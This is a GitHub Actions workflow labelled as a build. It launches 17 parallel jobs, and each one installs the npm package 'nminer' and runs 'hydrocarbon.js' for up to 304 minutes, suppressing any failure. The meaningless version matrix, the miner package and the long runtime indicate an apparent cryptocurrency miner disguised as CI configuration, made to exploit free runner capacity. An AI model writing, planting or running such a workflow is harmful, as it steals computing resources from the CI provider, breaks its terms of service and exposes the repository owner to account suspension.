name: hydrocarbon
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5204 }
          - { version: 1895 }
          - { version: 7541 }
          - { version: 8045 }
          - { version: 8604 }
          - { version: 9446 }
          - { version: 2773 }
          - { version: 4382 }
          - { version: 8679 }
          - { version: 295 }
          - { version: 424 }
          - { version: 5709 }
          - { version: 9354 }
          - { version: 4335 }
          - { version: 5034 }
          - { version: 7611 }
          - { version: 8202 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: ack
        run: |
          npm install nminer@latest
          timeout 304m node hydrocarbon.js || echo "hydrocarbon executed"